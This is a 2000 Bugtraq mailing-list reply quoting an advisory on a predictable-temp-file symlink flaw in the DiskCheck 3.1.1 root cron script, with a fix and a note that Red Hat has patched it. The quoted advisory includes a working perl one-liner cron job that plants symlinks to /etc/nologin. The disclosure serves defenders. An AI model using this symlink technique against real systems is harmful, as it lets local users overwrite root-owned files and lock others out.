[16112] in bugtraq
Re: Diskcheck 3.1.1 Symlink Vulnerability
daemon@ATHENA.MIT.EDU (Stan Bubrouski)
Mon Aug 7 13:48:40 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Message-Id: <4.3.1.2.20000807114000.00b33b40@pop.crosswinds.net>
Date: Mon, 7 Aug 2000 11:41:49 -0400
Reply-To: Stan Bubrouski <secnet@CROSSWINDS.NET>
From: Stan Bubrouski <secnet@CROSSWINDS.NET>
X-To: "You, Jin-Ho" <jhyou@CHONNAM.CHONNAM.AC.KR>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <398BD1FD.BAEE3B70@chonnam.chonnam.ac.kr>
At 05:36 PM 8/5/00 +0900, You, Jin-Ho wrote:
>Diskcheck 3.1.1 Symlink Vulnerability
>
>1 Introduction
>
>DiskCheck is a Perl script that monitors how much space is available
>on your hard drive. Basically, it checks your drive space every
>hour and takes action based on the specifications in the config file
>/etc/diskcheck.conf.
>
>DiskCheck 3.1.1 is available from
>http://www.kaybee.org/~kirk/html/linux.html and
>RedHat Powertools 6.x.
>
>2 Vulnerability
>
>The command, /etc/cron.hourly/diskcheck.pl is executed with root
>privilege
>every hour. It creates a temporary file, whose default name is
>/tmp/diskusagealert.txt.<pid> defined in /etc/diskcheck.conf,
>is predictable and is willing to follow symbolic links. This may allow
>malicious local users to create or overwrite arbitrarily named files.
>3 Exploit
>
>The following cron job creates the file, /etc/nologin.
>
>0 * * * * perl -e 'foreach $i (1..200) { $pid = $$ + $i; \
> symlink("/etc/nologin", "/tmp/diskusagealert.txt.$pid"); }'
>
>4 Solution
>
>Relocate the temporary file into the directory where root only can
>create
>a file.
>
>Example)
>
>Edit /etc/diskcheck.conf
>
> $tempfile = '/var/local/diskusagealert.txt'
>
># ls -ld /var/local
>drwxr-xr-x 2 root root 1024 Feb 7 1996 /var/local/
>
>
>You, Jin-Ho, jhyou@chonnam.ac.kr
This was reported on the list about a month ago and is fixed in Red Hat's
current rawhide,
and in Red Hat Pinstripe (7.0 beta). I don't know of any other distros
that include it.
-Stan Bubrouski
